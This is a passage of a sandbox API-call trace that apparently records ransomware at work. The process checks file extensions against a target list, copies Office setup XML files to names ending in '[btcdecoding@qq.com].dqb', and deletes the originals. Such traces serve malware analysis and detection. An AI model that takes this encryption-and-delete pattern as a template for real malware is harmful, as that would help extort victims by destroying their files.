controller\\proplusr\\proplusrww.xml")) returned 1 [0040.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.016] lstrlenW (lpString=".doc") returned 4 [0040.016] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.016] lstrlenW (lpString=".docx") returned 5 [0040.016] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.016] lstrlenW (lpString=".pdf") returned 4 [0040.016] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.016] lstrlenW (lpString=".xls") returned 4 [0040.016] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.016] lstrlenW (lpString=".xlsx") returned 5 [0040.016] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.016] lstrlenW (lpString=".ppt") returned 4 [0040.017] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.017] lstrlenW (lpString=".zip") returned 4 [0040.017] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.017] lstrlenW (lpString=".rar") returned 4 [0040.017] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.017] lstrlenW (lpString=".bz2") returned 4 [0040.017] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.017] lstrlenW (lpString=".7z") returned 3 [0040.017] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.017] lstrlenW (lpString=".dbf") returned 4 [0040.017] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.017] lstrlenW (lpString=".1cd") returned 4 [0040.017] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.017] lstrlenW (lpString=".jpg") returned 4 [0040.017] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.017] lstrlenW (lpString=".doc") returned 4 [0040.017] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.017] lstrlenW (lpString=".docx") returned 5 [0040.017] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.017] lstrlenW (lpString=".pdf") returned 4 [0040.017] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.017] lstrlenW (lpString=".xls") returned 4 [0040.017] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.017] lstrlenW (lpString=".xlsx") returned 5 [0040.017] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.017] lstrlenW (lpString=".ppt") returned 4 [0040.017] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.018] lstrlenW (lpString=".zip") returned 4 [0040.018] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.018] lstrlenW (lpString=".rar") returned 4 [0040.018] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.018] lstrlenW (lpString=".bz2") returned 4 [0040.018] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.018] lstrlenW (lpString=".7z") returned 3 [0040.018] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.018] lstrlenW (lpString=".dbf") returned 4 [0040.018] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.018] lstrlenW (lpString=".1cd") returned 4 [0040.018] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.018] lstrlenW (lpString=".jpg") returned 4 [0040.018] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.018] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.018] lstrlenW (lpString="SETUP.XML") returned 9 [0040.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.018] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=31094) returned 1 [0040.018] CloseHandle (hObject=0x180) returned 1 [0040.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 0x20 [0040.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.019] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.019] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.039] GetLastError () returned 0x0 [0040.039] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x7976, lpOverlapped=0x0) returned 1 [0040.041] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x7980, lpOverlapped=0x0) returned 1 [0040.042] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0040.042] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.042] SetEndOfFile (hFile=0x204) returned 1 [0040.042] CloseHandle (hObject=0x204) returned 1 [0040.043] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.043] SetEndOfFile (hFile=0x180) returned 1 [0040.044] CloseHandle (hObject=0x180) returned 1 [0040.044] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.044] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 1 [0040.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.045] lstrlenW (lpString=".doc") returned 4 [0040.045] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.045] lstrlenW (lpString=".docx") returned 5 [0040.045] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.045] lstrlenW (lpString=".pdf") returned 4 [0040.045] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.045] lstrlenW (lpString=".xls") returned 4 [0040.045] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.045] lstrlenW (lpString=".xlsx") returned 5 [0040.045] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.045] lstrlenW (lpString=".ppt") returned 4 [0040.045] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.045] lstrlenW (lpString=".zip") returned 4 [0040.045] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.045] lstrlenW (lpString=".rar") returned 4 [0040.045] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.045] lstrlenW (lpString=".bz2") returned 4 [0040.045] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.045] lstrlenW (lpString=".7z") returned 3 [0040.045] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.045] lstrlenW (lpString=".dbf") returned 4 [0040.045] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.045] lstrlenW (lpString=".1cd") returned 4 [0040.045] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.046] lstrlenW (lpString=".jpg") returned 4 [0040.046] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.046] lstrlenW (lpString=".doc") returned 4 [0040.046] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString=".docx") returned 5 [0040.046] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.046] lstrlenW (lpString=".pdf") returned 4 [0040.046] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString=".xls") returned 4 [0040.046] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString=".xlsx") returned 5 [0040.046] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.046] lstrlenW (lpString=".ppt") returned 4 [0040.046] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.046] lstrlenW (lpString=".zip") returned 4 [0040.046] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.046] lstrlenW (lpString=".rar") returned 4 [0040.046] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString=".bz2") returned 4 [0040.046] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString=".7z") returned 3 [0040.046] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.046] lstrlenW (lpString=".dbf") returned 4 [0040.046] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.046] lstrlenW (lpString=".1cd") returned 4 [0040.046] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.046] lstrlenW (lpString=".jpg") returned 4 [0040.046] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.047] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.047] lstrlenW (lpString="PublisherMUI.XML") returned 16 [0040.047] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.047] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1450) returned 1 [0040.047] CloseHandle (hObject=0x180) returned 1 [0040.047] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 0x20 [0040.047] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.047] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.047] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.047] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.047] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.049] GetLastError () returned 0x0 [0040.049] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x5aa, lpOverlapped=0x0) returned 1 [0040.261] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0040.262] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0040.262] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xf4, lpOverlapped=0x0) returned 1 [0040.262] SetEndOfFile (hFile=0x204) returned 1 [0040.262] CloseHandle (hObject=0x204) returned 1 [0040.263] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.263] SetEndOfFile (hFile=0x180) returned 1 [0040.264] CloseHandle (hObject=0x180) returned 1 [0040.264] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.264] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 1 [0040.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.265] lstrlenW (lpString=".doc") returned 4 [0040.265] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.265] lstrlenW (lpString=".docx") returned 5 [0040.265] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.265] lstrlenW (lpString=".pdf") returned 4 [0040.265] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.265] lstrlenW (lpString=".xls") returned 4 [0040.265] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.265] lstrlenW (lpString=".xlsx") returned 5 [0040.265] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.265] lstrlenW (lpString=".ppt") returned 4 [0040.265] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.265] lstrlenW (lpString=".zip") returned 4 [0040.265] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.265] lstrlenW (lpString=".rar") returned 4 [0040.265] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.265] lstrlenW (lpString=".bz2") returned 4 [0040.265] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.265] lstrlenW (lpString=".7z") returned 3 [0040.265] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.265] lstrlenW (lpString=".dbf") returned 4 [0040.265] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.265] lstrlenW (lpString=".1cd") returned 4 [0040.265] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.266] lstrlenW (lpString=".jpg") returned 4 [0040.266] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.266] lstrlenW (lpString=".doc") returned 4 [0040.266] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString=".docx") returned 5 [0040.266] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.266] lstrlenW (lpString=".pdf") returned 4 [0040.266] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString=".xls") returned 4 [0040.266] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString=".xlsx") returned 5 [0040.266] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.266] lstrlenW (lpString=".ppt") returned 4 [0040.266] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.266] lstrlenW (lpString=".zip") returned 4 [0040.266] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.266] lstrlenW (lpString=".rar") returned 4 [0040.266] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString=".bz2") returned 4 [0040.266] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString=".7z") returned 3 [0040.266] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.266] lstrlenW (lpString=".dbf") returned 4 [0040.266] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.266] lstrlenW (lpString=".1cd") returned 4 [0040.266] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0040.266] lstrlenW (lpString=".jpg") returned 4 [0040.267] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.267] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.267] lstrlenW (lpString="SETUP.XML") returned 9 [0040.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.368] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1608) returned 1 [0040.368] CloseHandle (hObject=0x19c) returned 1 [0040.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 0x20 [0040.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.369] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.369] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.369] GetLastError () returned 0x0 [0040.369] ReadFile (in: hFile=0x19c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x648, lpOverlapped=0x0) returned 1 [0040.414] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x650, lpOverlapped=0x0) returned 1 [0040.415] ReadFile (in: hFile=0x19c, lpBuffer=0x3a80020, 